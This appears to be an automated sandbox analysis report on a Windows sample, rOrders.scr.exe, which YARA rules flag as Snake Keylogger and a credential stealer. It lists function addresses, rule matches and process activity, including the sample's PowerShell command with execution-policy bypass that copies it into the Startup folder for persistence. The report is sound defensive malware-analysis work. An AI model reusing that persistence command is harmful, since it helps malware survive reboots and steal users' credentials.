Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FCAA0	9_2_069FCAA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FFA59	9_2_069FFA59
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FFA68	9_2_069FFA68
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FDBF1	9_2_069FDBF1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069F73E8	9_2_069F73E8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FD350	9_2_069FD350
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FD34F	9_2_069FD34F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069F08FF	9_2_069F08FF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069F003F	9_2_069F003F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FE058	9_2_069FE058
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FE049	9_2_069FE049
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069F386F	9_2_069F386F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069F11BF	9_2_069F11BF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FF1B8	9_2_069FF1B8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FF1B7	9_2_069FF1B7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FC1F0	9_2_069FC1F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FC1E0	9_2_069FC1E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FE908	9_2_069FE908
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FE907	9_2_069FE907
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069F0900	9_2_069F0900
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FB930	9_2_069FB930
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_069FB940	9_2_069FB940
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2B6E8	9_2_06A2B6E8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A28608	9_2_06A28608
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2D670	9_2_06A2D670
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2AA58	9_2_06A2AA58
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2C388	9_2_06A2C388
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2B0A0	9_2_06A2B0A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2D028	9_2_06A2D028
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2A408	9_2_06A2A408
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A28C5F	9_2_06A28C5F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A211A0	9_2_06A211A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2C9D8	9_2_06A2C9D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2BD38	9_2_06A2BD38
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A20D48	9_2_06A20D48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A25EB8	9_2_06A25EB8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2B6E7	9_2_06A2B6E7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A25EC8	9_2_06A25EC8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2560A	9_2_06A2560A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A25618	9_2_06A25618
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2D663	9_2_06A2D663
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A25A60	9_2_06A25A60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A25A70	9_2_06A25A70
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2AA48	9_2_06A2AA48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A233A8	9_2_06A233A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A233B8	9_2_06A233B8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A26BCF	9_2_06A26BCF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A26BD0	9_2_06A26BD0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A26320	9_2_06A26320
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A23730	9_2_06A23730
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2631F	9_2_06A2631F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2676A	9_2_06A2676A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A26778	9_2_06A26778
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2C378	9_2_06A2C378
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A274A8	9_2_06A274A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A228B0	9_2_06A228B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A20497	9_2_06A20497
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A27497	9_2_06A27497
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A20498	9_2_06A20498
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2B09F	9_2_06A2B09F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A208EF	9_2_06A208EF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A208F0	9_2_06A208F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A278FF	9_2_06A278FF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A24430	9_2_06A24430
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A20007	9_2_06A20007
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A22807	9_2_06A22807
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2A407	9_2_06A2A407
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A22809	9_2_06A22809
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2D018	9_2_06A2D018
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A20040	9_2_06A20040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A27040	9_2_06A27040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A27050	9_2_06A27050
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A281AF	9_2_06A281AF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A281B0	9_2_06A281B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2518A	9_2_06A2518A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A21191	9_2_06A21191
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A25198	9_2_06A25198
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A285FB	9_2_06A285FB
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2C9C8	9_2_06A2C9C8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A2BD28	9_2_06A2BD28
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A20D39	9_2_06A20D39
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A27900	9_2_06A27900
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A27D57	9_2_06A27D57
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 9_2_06A27D58	9_2_06A27D58

Source: rOrders.scr.exe, 00000000.00000002.4532386478.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs rOrders.scr.exe
Source: rOrders.scr.exe, 00000000.00000002.4557355431.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs rOrders.scr.exe
Source: rOrders.scr.exe, 00000000.00000000.2060312871.0000000000762000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFisa.exe* vs rOrders.scr.exe
Source: rOrders.scr.exe, 00000000.00000002.4536710280.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs rOrders.scr.exe
Source: rOrders.scr.exe, 00000000.00000002.4536710280.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs rOrders.scr.exe
Source: rOrders.scr.exe, 00000000.00000002.4557355431.0000000003C98000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs rOrders.scr.exe
Source: rOrders.scr.exe, 00000004.00000002.4531654601.0000000000D87000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs rOrders.scr.exe
Source: rOrders.scr.exe, 00000004.00000002.4531261400.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs rOrders.scr.exe
Source: rOrders.scr.exe	Binary or memory string: OriginalFilenameFisa.exe* vs rOrders.scr.exe

Source: rOrders.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.rOrders.scr.exe.3c99840.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.rOrders.scr.exe.3c78e10.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rOrders.scr.exe.3c78e10.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.00.exe.42c8570.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.rOrders.scr.exe.3c78e10.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.rOrders.scr.exe.3c78e10.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.rOrders.scr.exe.2ed8d64.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.rOrders.scr.exe.3c99840.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rOrders.scr.exe.3c99840.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.rOrders.scr.exe.3c99840.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 6.2.00.exe.35b6fb8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.rOrders.scr.exe.2ed6524.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 6.2.00.exe.35b97f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 00000000.00000002.4557355431.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.4557355431.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.4557355431.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.4557355431.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000004.00000002.4531261400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.4531261400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: rOrders.scr.exe PID: 1848, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: rOrders.scr.exe PID: 1848, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: rOrders.scr.exe PID: 4760, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: rOrders.scr.exe PID: 4760, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: classification engine

Classification label: mal100.spre.troj.adwa.spyw.evad.winEXE@13/12@2/3

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6128:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iez5e3yu.3xw.ps1

Jump to behavior

Source: rOrders.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: rOrders.scr.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\rOrders.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: rOrders.scr.exe, 00000004.00000002.4536657049.0000000003010000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002FDC000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000003003000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4547004798.0000000003E0F000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002FBE000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002EFC000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4548505146.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: rOrders.scr.exe	Virustotal: Detection: 56%
Source: rOrders.scr.exe	ReversingLabs: Detection: 65%

Source: unknown	Process created: C:\Users\user\Desktop\rOrders.scr.exe "C:\Users\user\Desktop\rOrders.scr.exe"
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\rOrders.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process created: C:\Users\user\Desktop\rOrders.scr.exe "C:\Users\user\Desktop\rOrders.scr.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe"
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\rOrders.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Process created: C:\Users\user\Desktop\rOrders.scr.exe "C:\Users\user\Desktop\rOrders.scr.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Section loaded: coremessaging.dll	Jump to behavior
